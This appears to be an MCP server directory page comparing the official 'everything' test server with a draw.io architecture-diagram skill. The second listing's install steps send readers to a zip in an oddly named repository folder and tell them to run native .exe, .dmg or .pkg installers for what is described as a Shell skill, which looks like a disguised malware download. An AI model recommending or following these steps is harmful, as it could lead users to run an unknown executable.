everything vs drawio-architecture-skill
Side-by-side comparison to help you pick between these two MCP servers.
everything by modelcontextprotocol | drawio-architecture-skill by quant-chiggz | |
|---|---|---|
| Stars | ★ 85,748 | ★ 2 |
| 30d uses | — | — |
| Score | 77 | 35 |
| Official | ✓ | — |
| Categories | Developer ToolsAI / LLM ToolsOther | Developer ToolsAI / LLM ToolsProductivity |
| Language | TypeScript | Shell |
| Last commit | this month | this month |
everything · Summary
Official MCP test server exercising all protocol features for client builders.
drawio-architecture-skill · Summary
A Claude Code skill for creating architecture diagrams using draw.io with customizable styles and multi-format export.
everything · Use cases
- Testing MCP client implementations against all protocol features
- Learning MCP protocol capabilities through a reference server
- Validating client compatibility with different transport methods
drawio-architecture-skill · Use cases
- Software architects documenting system designs
- Project managers creating process flowcharts
- Developers visualizing UML class relationships
everything · Install
NPX (recommended)
{
"mcpServers": {
"everything": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-everything"]
}
}
}On Windows, use cmd /c:
{
"mcpServers": {
"everything": {
"command": "cmd",
"args": ["/c", "npx", "-y", "@modelcontextprotocol/server-everything"]
}
}
}Docker
{
"mcpServers": {
"everything": {
"command": "docker",
"args": ["run", "-i", "--rm", "mcp/everything"]
}
}
}Global install
npm install -g @modelcontextprotocol/server-everything@latest
npx @modelcontextprotocol/server-everythingdrawio-architecture-skill · Install
Installation Steps
- Download the skill from [the release page](https://raw.githubusercontent.com/quant-chiggz/drawio-architecture-skill/main/Cenchrus/drawio_skill_architecture_1.0.zip)
- Install the appropriate installer for your OS:
- Windows: Run the .exe or .msi file - macOS: Open the .dmg or .pkg file - Linux: Make .AppImage executable or install with dpkg
- Open Claude Code to access the skill
To enable in Claude Desktop:
{
"mcpServers": {
"drawio-architecture": {
"command": "path/to/drawio-architecture-skill",
"args": []
}
}
}